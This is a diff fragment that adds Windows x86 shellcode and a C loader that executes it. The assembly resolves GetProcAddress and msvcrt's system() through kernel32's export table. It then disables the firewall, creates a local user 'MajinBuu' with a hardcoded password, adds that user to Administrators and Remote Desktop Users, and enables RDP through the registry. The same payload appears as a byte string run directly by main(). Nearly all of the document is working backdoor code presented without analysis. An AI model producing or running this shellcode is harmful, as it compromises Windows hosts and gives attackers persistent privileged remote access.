+ add ebx, eax ; EBX = &ExportTable
+
+; Find the address of the Name Pointer Table within kernel32.dll
+ mov edi, [ebx+0x20] ; EDI = RVA NamePointerTable
+ add edi, eax ; EDI = &NamePointerTable
+ mov [ebp-0x8], edi ; save &NamePointerTable to stack frame
+
+; Find the address of the Ordinal Table
+ mov ecx, [ebx+0x24] ; ECX = RVA OrdinalTable
+ add ecx, eax ; ECX = &OrdinalTable
+ mov [ebp-0xC], ecx ; save &OrdinalTable to stack-frame
+
+; Find the address of the Address Table
+ mov edx, [ebx+0x1C] ; EDX = RVA AddressTable
+ add edx, eax ; EDX = &AddressTable
+ mov [ebp-0x10], edx ; save &AddressTable to stack-frame
+
+; Find Number of Functions within the Export Table of kernel32.dll
+ mov edx, [ebx+0x14] ; EDX = Number of Functions
+ mov [ebp-0x14], edx ; save value of Number of Functions to stack-frame
+
+jmp short functions
+
+findFunctionAddr:
+; Initialize the Counter to prevent infinite loop
+ xor eax, eax ; EAX = Counter = 0
+ mov edx, [ebp-0x14] ; get value of Number of Functions from stack-frame
+; Loop through the NamePointerTable and compare our Strings to the Name Strings of kernel32.dll
+searchLoop:
+ mov edi, [ebp-0x8] ; EDI = &NamePointerTable
+ mov esi, [ebp-0x18] ; ESI = Address of String for the Symbol we are searching for
+ xor ecx, ecx ; ECX = 0x00000000
+ cld ; clear direction flag - Process strings from left to right
+ mov edi, [edi+eax*4] ; EDI = RVA NameString = [&NamePointerTable + (Counter * 4)]
+ add edi, [ebp-0x4] ; EDI = &NameString = RVA NameString + &kernel32.dll
+ add cx, 0xF ; ECX = len("GetProcAddress,0x00") = 15 = 14 char + 1 Null
+ repe cmpsb ; compare first 8 bytes of [&NameString] to "GetProcAddress,0x00"
+ jz found ; If string at [&NameString] == "GetProcAddress,0x00", then end loop
+ inc eax ; else Counter ++
+ cmp eax, edx ; Does EAX == Number of Functions?
+ jb searchLoop ; If EAX != Number of Functions, then restart the loop
+
+found:
+; Find the address of GetProcAddress by using the last value of the Counter
+ mov ecx, [ebp-0xC] ; ECX = &OrdinalTable
+ mov edx, [ebp-0x10] ; EDX = &AddressTable
+ mov ax, [ecx + eax*2] ; AX = ordinalNumber = [&OrdinalTable + (Counter*2)]
+ mov eax, [edx + eax*4] ; EAX = RVA GetProcAddress = [&AddressTable + ordinalNumber]
+ add eax, [ebp-0x4] ; EAX = &GetProcAddress = RVA GetProcAddress + &kernel32.dll
+ ret
+
+functions:
+# Push string "GetProcAddress",0x00 onto the stack
+ xor eax, eax ; clear eax register
+ mov ax, 0x7373 ; AX is the lower 16-bits of the 32bit EAX Register
+ push eax ; ss : 73730000 // EAX = 0x00007373 // \x73=ASCII "s"
+ push 0x65726464 ; erdd : 65726464 // "GetProcAddress"
+ push 0x41636f72 ; Acor : 41636f72
+ push 0x50746547 ; PteG : 50746547
+ mov [ebp-0x18], esp ; save PTR to string at bottom of stack (ebp)
+ call findFunctionAddr ; After Return EAX will = &GetProcAddress
+# EAX = &GetProcAddress
+ mov [ebp-0x1C], eax ; save &GetProcAddress
+
+; Call GetProcAddress(&kernel32.dll, PTR "LoadLibraryA"0x00)
+ xor edx, edx ; EDX = 0x00000000
+ push edx ; null terminator for LoadLibraryA string
+ push 0x41797261 ; Ayra : 41797261 // "LoadLibraryA",0x00
+ push 0x7262694c ; rbiL : 7262694c
+ push 0x64616f4c ; daoL : 64616f4c
+ push esp ; $hModule -- push the address of the start of the string onto the stack
+ push dword [ebp-0x4] ; $lpProcName -- push base address of kernel32.dll to the stack
+ mov eax, [ebp-0x1C] ; Move the address of GetProcAddress into the EAX register
+ call eax ; Call the GetProcAddress Function.
+ mov [ebp-0x20], eax ; save Address of LoadLibraryA
+
+; Call LoadLibraryA(PTR "msvcrt")
+; push "msvcrt",0x00 to the stack and save pointer
+ xor eax, eax ; clear eax
+ mov ax, 0x7472 ; tr : 7472
+ push eax
+ push 0x6376736D ; cvsm : 6376736D
+ push esp ; push the pointer to the string
+ mov ebx, [ebp-0x20] ; LoadLibraryA Address to ebx register
+ call ebx ; call the LoadLibraryA Function to load msvcrt.dll
+ mov [ebp-0x24], eax ; save Address of msvcrt.dll
+
+; Call GetProcAddress(msvcrt.dll, "system")
+ xor edx, edx
+ mov dx, 0x6d65 ; me : 6d65
+ push edx
+ push 0x74737973 ; tsys : 74737973
+ push esp ; push pointer to string to stack for 'system'
+ push dword [ebp-0x24] ; push base address of msvcrt.dll to stack
+ mov eax, [ebp-0x1C] ; PTR to GetProcAddress to EAX
+ call eax ; GetProcAddress
+; EAX = WSAStartup Address
+ mov [ebp-0x28], eax ; save Address of msvcrt.system
+
+; 'netsh firewall set opmode mode=DISABLE'
+xor ecx, ecx
+mov cx, 0x454c ; EL : 454c
+push ecx
+push 0x42415349 ; BASI : 42415349
+push 0x443d6564 ; D=ed : 443d6564
+push 0x6f6d2065 ; om e : 6f6d2065
+push 0x646f6d70 ; domp : 646f6d70
+push 0x6f207465 ; o te : 6f207465
+push 0x73206c6c ; s ll : 73206c6c
+push 0x61776572 ; awer : 61776572
+push 0x69662068 ; if h : 69662068
+push 0x7374656e ; sten : 7374656e
+push esp ; push pointer to string
+mov eax, [ebp-0x28] ; msvcrt.system address
+call eax ; call system
+
+; 'net user MajinBuu TurnU2C@ndy!! /add'
+xor ecx, ecx
+push ecx
+push 0x6464612f ; dda/ : 6464612f
+push 0x20212179 ; !!y : 20212179
+push 0x646e4043 ; dn@C : 646e4043
+push 0x32556e72 ; 2Unr : 32556e72
+push 0x75542075 ; uT u : 75542075
+push 0x75426e69 ; uBni : 75426e69
+push 0x6a614d20 ; jaM : 6a614d20
+push 0x72657375 ; resu : 72657375
+push 0x2074656e ; ten : 2074656e
+push esp ; push pointer to string
+mov eax, [ebp-0x28] ; msvcrt.system address
+call eax ; call system
+
+; 'net localgroup Administrators MajinBuu /add'
+xor ecx, ecx
+push ecx
+mov ecx, 0x64646190 ; dda : 646461
+shr ecx, 8
+push ecx
+push 0x2f207575 ; / uu : 2f207575
+push 0x426e696a ; Bnij : 426e696a
+push 0x614d2073 ; aM s : 614d2073
+push 0x726f7461 ; rota : 726f7461
+push 0x72747369 ; rtsi : 72747369
+push 0x6e696d64 ; nimd : 6e696d64
+push 0x41207075 ; A pu : 41207075
+push 0x6f72676c ; orgl : 6f72676c
+push 0x61636f6c ; acol : 61636f6c
+push 0x2074656e ; ten : 2074656e
+push esp ; push pointer to string
+mov eax, [ebp-0x28] ; msvcrt.system address
+call eax ; call system
+
+; 'net localgroup "Remote Desktop Users" MajinBuu /add'
+xor ecx, ecx
+push ecx
+mov ecx, 0x64646190 ; dda : 646461
+shr ecx, 8
+push ecx
+push 0x2f207575 ; / uu : 2f207575
+push 0x426e696a ; Bnij : 426e696a
+push 0x614d2022 ; aM " : 614d2022
+push 0x73726573 ; sres : 73726573
+push 0x5520706f ; U po : 5520706f
+push 0x746b7365 ; tkse : 746b7365
+push 0x44206574 ; D et : 44206574
+push 0x6f6d6552 ; omeR : 6f6d6552
+push 0x22207075 ; " pu : 22207075
+push 0x6f72676c ; orgl : 6f72676c
+push 0x61636f6c ; acol : 61636f6c
+push 0x2074656e ; ten : 2074656e
+push esp ; push pointer to string
+mov eax, [ebp-0x28] ; msvcrt.system address
+call eax ; call system
+
+; 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'
+xor ecx, ecx
+push ecx
+push 0x662f2030 ; f/ 0 : 662f2030
+push 0x20642f20 ; d/ : 20642f20
+push 0x44524f57 ; DROW : 44524f57
+push 0x445f4745 ; D_GE : 445f4745
+push 0x5220742f ; R t/ : 5220742f
+push 0x20736e6f ; sno : 20736e6f
+push 0x69746365 ; itce : 69746365
+push 0x6e6e6f43 ; nnoC : 6e6e6f43
+push 0x5354796e ; STyn : 5354796e
+push 0x65446620 ; eDf : 65446620
+push 0x762f2022 ; v/ " : 762f2022
+push 0x72657672 ; revr : 72657672
+push 0x6553206c ; eS l : 6553206c
+push 0x616e696d ; anim : 616e696d
+push 0x7265545c ; reT\ : 7265545c
+push 0x6c6f7274 ; lort : 6c6f7274
+push 0x6e6f435c ; noC\ : 6e6f435c
+push 0x7465536c ; teSl : 7465536c
+push 0x6f72746e ; ortn : 6f72746e
+push 0x6f43746e ; oCtn : 6f43746e
+push 0x65727275 ; erru : 65727275
+push 0x435c4d45 ; C\ME : 435c4d45
+push 0x54535953 ; TSYS : 54535953
+push 0x5c454e49 ; \ENI : 5c454e49
+push 0x4843414d ; HCAM : 4843414d
+push 0x5f4c4143 ; _LAC : 5f4c4143
+push 0x4f4c5f59 ; OL_Y : 4f4c5f59
+push 0x454b4822 ; EKH" : 454b4822
+push 0x20646461 ; dda : 20646461
+push 0x20676572 ; ger : 20676572
+push esp ; push pointer to string
+mov eax, [ebp-0x28] ; msvcrt.system address
+call eax ; call system
+
+
+######################################################################################
+#include <windows.h>
+#include <stdio.h>
+
+char code[] = \
+"\x89\xe5\x83\xec\x30\x31\xdb\x64\x8b\x5b\x30\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x1b"
+"\x8b\x43\x08\x89\x45\xfc\x8b\x58\x3c\x01\xc3\x8b\x5b\x78\x01\xc3\x8b\x7b\x20\x01\xc7"
+"\x89\x7d\xf8\x8b\x4b\x24\x01\xc1\x89\x4d\xf4\x8b\x53\x1c\x01\xc2\x89\x55\xf0\x8b\x53"
+"\x14\x89\x55\xec\xeb\x32\x31\xc0\x8b\x55\xec\x8b\x7d\xf8\x8b\x75\xe8\x31\xc9\xfc\x8b"
+"\x3c\x87\x03\x7d\xfc\x66\x83\xc1\x0f\xf3\xa6\x74\x05\x40\x39\xd0\x72\xe4\x8b\x4d\xf4"
+"\x8b\x55\xf0\x66\x8b\x04\x41\x8b\x04\x82\x03\x45\xfc\xc3\x31\xc0\x66\xb8\x73\x73\x50"
+"\x68\x64\x64\x72\x65\x68\x72\x6f\x63\x41\x68\x47\x65\x74\x50\x89\x65\xe8\xe8\xb0\xff"
+"\xff\xff\x89\x45\xe4\x31\xd2\x52\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f"
+"\x61\x64\x54\xff\x75\xfc\x8b\x45\xe4\xff\xd0\x89\x45\xe0\x31\xc0\x66\xb8\x72\x74\x50"
+"\x68\x6d\x73\x76\x63\x54\x8b\x5d\xe0\xff\xd3\x89\x45\xdc\x31\xd2\x66\xba\x65\x6d\x52"
+"\x68\x73\x79\x73\x74\x54\xff\x75\xdc\x8b\x45\xe4\xff\xd0\x89\x45\xd8\x31\xc9\x66\xb9"
+"\x4c\x45\x51\x68\x49\x53\x41\x42\x68\x64\x65\x3d\x44\x68\x65\x20\x6d\x6f\x68\x70\x6d"
+"\x6f\x64\x68\x65\x74\x20\x6f\x68\x6c\x6c\x20\x73\x68\x72\x65\x77\x61\x68\x68\x20\x66"
+"\x69\x68\x6e\x65\x74\x73\x54\x8b\x45\xd8\xff\xd0\x31\xc9\x51\x68\x2f\x61\x64\x64\x68"
+"\x79\x21\x21\x20\x68\x43\x40\x6e\x64\x68\x72\x6e\x55\x32\x68\x75\x20\x54\x75\x68\x69"
+"\x6e\x42\x75\x68\x20\x4d\x61\x6a\x68\x75\x73\x65\x72\x68\x6e\x65\x74\x20\x54\x8b\x45"
+"\xd8\xff\xd0\x31\xc9\x51\xb9\x90\x61\x64\x64\xc1\xe9\x08\x51\x68\x75\x75\x20\x2f\x68"
+"\x6a\x69\x6e\x42\x68\x73\x20\x4d\x61\x68\x61\x74\x6f\x72\x68\x69\x73\x74\x72\x68\x64"
+"\x6d\x69\x6e\x68\x75\x70\x20\x41\x68\x6c\x67\x72\x6f\x68\x6c\x6f\x63\x61\x68\x6e\x65"
+"\x74\x20\x54\x8b\x45\xd8\xff\xd0\x31\xc9\x51\xb9\x90\x61\x64\x64\xc1\xe9\x08\x51\x68"
+"\x75\x75\x20\x2f\x68\x6a\x69\x6e\x42\x68\x22\x20\x4d\x61\x68\x73\x65\x72\x73\x68\x6f"
+"\x70\x20\x55\x68\x65\x73\x6b\x74\x68\x74\x65\x20\x44\x68\x52\x65\x6d\x6f\x68\x75\x70"
+"\x20\x22\x68\x6c\x67\x72\x6f\x68\x6c\x6f\x63\x61\x68\x6e\x65\x74\x20\x54\x8b\x45\xd8"
+"\xff\xd0\x31\xc9\x51\x68\x30\x20\x2f\x66\x68\x20\x2f\x64\x20\x68\x57\x4f\x52\x44\x68"
+"\x45\x47\x5f\x44\x68\x2f\x74\x20\x52\x68\x6f\x6e\x73\x20\x68\x65\x63\x74\x69\x68\x43"
+"\x6f\x6e\x6e\x68\x6e\x79\x54\x53\x68\x20\x66\x44\x65\x68\x22\x20\x2f\x76\x68\x72\x76"
+"\x65\x72\x68\x6c\x20\x53\x65\x68\x6d\x69\x6e\x61\x68\x5c\x54\x65\x72\x68\x74\x72\x6f"
+"\x6c\x68\x5c\x43\x6f\x6e\x68\x6c\x53\x65\x74\x68\x6e\x74\x72\x6f\x68\x6e\x74\x43\x6f"
+"\x68\x75\x72\x72\x65\x68\x45\x4d\x5c\x43\x68\x53\x59\x53\x54\x68\x49\x4e\x45\x5c\x68"
+"\x4d\x41\x43\x48\x68\x43\x41\x4c\x5f\x68\x59\x5f\x4c\x4f\x68\x22\x48\x4b\x45\x68\x61"
+"\x64\x64\x20\x68\x72\x65\x67\x20\x54\x8b\x45\xd8\xff\xd0";
+
+int main(int argc, char **argv)
+{
+ int (*func)();
+ func = (int(*)()) code;
+ (int)(*func)();
+}
\ No newline at end of file